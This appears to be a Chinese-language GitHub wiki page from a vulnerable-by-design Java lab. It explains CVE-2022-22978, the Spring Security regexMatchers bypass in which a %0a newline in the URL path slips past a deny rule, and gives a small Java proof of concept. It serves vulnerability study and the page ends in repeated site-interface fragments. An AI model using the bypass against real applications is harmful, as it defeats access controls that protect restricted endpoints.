CVE 2022 22978

靶场环境

CVE-2022-22978 java-sec-code的靶场环境：

Spring-Security版本：4.2.12.RELEASE

代码：

 http.authorizeRequests().regexMatchers("/black_path.*").denyAll()

访问http://localhost:8080/black_path返回 403 forbidden by JoyChou.

访问http://localhost:8080/black_path%0a返回404页面。由于低版本的SpringBoot无法接收%0d和%0a路由，SpringBoot 2.7.x可接收。并且java-sec-code的SpringBoot版本不方便升级，所以没写black_path的路由，只是为了单纯证明可绕过Spring Security。

CVE-2022-22978漏洞原理

 public static void main(String[] args) throws Exception{ Pattern vuln_pattern = Pattern.compile("/black_path.*"); Pattern sec_pattern = Pattern.compile("/black_path.*", Pattern.DOTALL); String poc = URLDecoder.decode("/black_path%0a/xx", StandardCharsets.UTF_8.toString()); System.out.println("Poc: " + poc); System.out.println("Not dotall: " + vuln_pattern.matcher(poc).matches()); // false，非dotall无法匹配\r\n System.out.println("Dotall: " + sec_pattern.matcher(poc).matches()); // true，dotall可以匹配\r\n }

返回：

Poc: /black_path /xx Not dotall: false Dotall: true

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

CVE 2022 22978

靶场环境

CVE-2022-22978漏洞原理

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Uh oh!

Clone this wiki locally